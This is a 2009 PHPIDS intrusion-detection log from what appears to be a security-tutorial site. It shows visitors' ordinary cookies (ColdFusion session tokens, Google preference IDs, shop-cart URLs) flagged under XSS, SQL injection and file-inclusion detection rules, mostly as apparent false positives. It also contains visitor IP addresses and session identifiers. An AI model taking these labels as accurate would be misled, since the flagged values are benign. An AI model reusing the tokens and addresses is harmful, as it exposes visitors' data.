Centrifuge detection data
Threshold: 3.49
Ratio: 2.6363636363636

ID:59439
Name:REQUEST.Apache
Value:"D~51fc3947f14d8427b7d6ac529710e832"
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59440
Name:COOKIE.PREF
Value:ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59441
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59442
Name:COOKIE.DB
Value:msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59443
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59444
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59445
Name:COOKIE._designrelated_id
Value:BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.6363636363636

ID:59446
Name:REQUEST.PREF
Value:ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59447
Name:COOKIE.Apache
Value:"D~51fc3947f14d8427b7d6ac529710e832"
Page:/i.php?page=videos%2Fowasp-top-5-louisville
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59448
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59449
Name:REQUEST.DB
Value:msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59450
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59451
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59452
Name:REQUEST._designrelated_id
Value:BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.6363636363636

ID:59453
Name:REQUEST.Apache
Value:"D~51fc3947f14d8427b7d6ac529710e832"
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59454
Name:COOKIE.PREF
Value:ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59455
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59456
Name:COOKIE.DB
Value:msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59457
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59458
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59459
Name:COOKIE._designrelated_id
Value:BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.6363636363636

ID:59460
Name:COOKIE.Apache
Value:"D~51fc3947f14d8427b7d6ac529710e832"
Page:/i.php?page=security%2Farpfreeze-static-arp-poisoning
IP:62.141.48.83
Impact:170
Created:2009-11-07 17:37:53
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59461
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59462
Name:REQUEST.DB
Value:msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59463
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59464
Name:REQUEST.RubricSession
Value:U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.875

ID:59465
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59466
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59467
Name:COOKIE.DB
Value:msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59468
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59469
Name:COOKIE.RubricSession
Value:U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.875

ID:59470
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:/i.php?page=security%2Fxss-sql-and-command-inject-vectors
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59471
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59472
Name:REQUEST.DB
Value:msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59473
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59474
Name:REQUEST.RubricSession
Value:U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.875

ID:59475
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59476
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1647416&CFTOKEN#=11648233&jsessionid#=3030e2f5c781896300d41f7b23227b7d6321#lastvisit={ts '2009-11-07 11:47:27'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=9#cftoken=11648233#cfid=1647416#
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59477
Name:COOKIE.DB
Value:msRandX=21&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59478
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5311064&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59479
Name:COOKIE.RubricSession
Value:U2FsdGVkX18dL03TMw8vwhDfKjaUKxn2cGubcPCSTMw=
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.875

ID:59480
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 3:46:29 PM
Page:/i.php?page=books
IP:78.46.48.169
Impact:126
Created:2009-11-07 17:37:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59379
Name:REQUEST.PREF
Value:ID=27c43181615276c1:TM=1257632984:LM=1257632984:S=h7w0cREtSBuJaWq3
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59380
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59381
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20362
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59382
Name:REQUEST.CommunityServer-UserCookie1001
Value:mra=11/7/2009 6:12:14 AM
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59383
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1647409&CFTOKEN#=43458014&jsessionid#=3030dd227a70b528e33234624e2256436e7f#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 07:03:18'}#hitcount=9#cftoken=43458014#cfid=1647409#
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59384
Name:REQUEST.DB
Value:msRandX=93&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59385
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279858&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59386
Name:REQUEST.RubricSession
Value:U2FsdGVkX18iVFgMfh2HBpP0qjQM8QZMZmI6QA407kc=
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Impact: 7 | Tags: xss, csrf, id, rfe, lfi
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.7058823529412

ID:59387
Name:COOKIE.PREF
Value:ID=27c43181615276c1:TM=1257632984:LM=1257632984:S=h7w0cREtSBuJaWq3
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59388
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fndiff-nmap-5
IP:78.46.48.165
Impact:172
Created:2009-11-07 17:37:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59389
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20362
